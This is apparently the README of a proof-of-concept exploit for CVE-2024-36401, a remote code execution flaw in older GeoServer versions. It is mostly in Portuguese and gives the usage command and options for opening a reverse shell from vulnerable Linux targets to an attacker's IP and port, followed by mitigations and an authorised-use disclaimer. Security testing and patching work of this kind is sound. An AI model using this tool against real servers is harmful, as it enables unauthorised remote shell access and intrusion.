
POC for CVE-2024-36401. This POC will attempt to establish a reverse shell from the vlun targets.
POC para CVE-2024-36401 GeoServer. Este POC tentará estabelecer um shell reverso do sistema a partir dos alvos.

POC para CVE-2024-36401: RCE para versões do GeoServer anteriores a 2.25.1, 2.24.3 e 2.23.5. Este POC é baseado no aviso de segurança de phith0n.
Este POC tentará estabelecer um shell reverso a partir dos alvos vulneráveis. Ele é projetado para funcionar contra alvos Linux vulneráveis. Você precisará de uma máquina com um IP publicado e acessível para executar este POC.
requestsPara usar este POC contra um único alvo:
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type
Ajuda:
python3 CVE-2024-36401.py -h
options:
-h, --help show this help message and exit
-u U Target, example https://target:8080
-ip IP Your IP, example 192.168.1.1
-port PORT Port, example 1337
-type TYPE Type, example sf:archsites
1- Desative requisições WFS.
2- Proteja seu Linux configurando iptables para desabilitar conexões reversas, defina políticas padrão para descartar todo o tráfego, permita conexões estabelecidas e relacionadas, e permita apenas tráfego de saída essencial como DNS, HTTP e HTTPS.
3- Ou atualize para a versão mais recente do GeoServer.
Para quaisquer sugestões ou ideias, entre em contato com eu.
Gosto de criar minhas próprias ferramentas apenas para diversão, trabalho e fins educacionais. Não apoio nem incentivo hacking ou acesso não autorizado a qualquer sistema ou rede. Por favor, use minhas ferramentas de forma responsável e apenas em sistemas onde você tenha permissão clara para testar.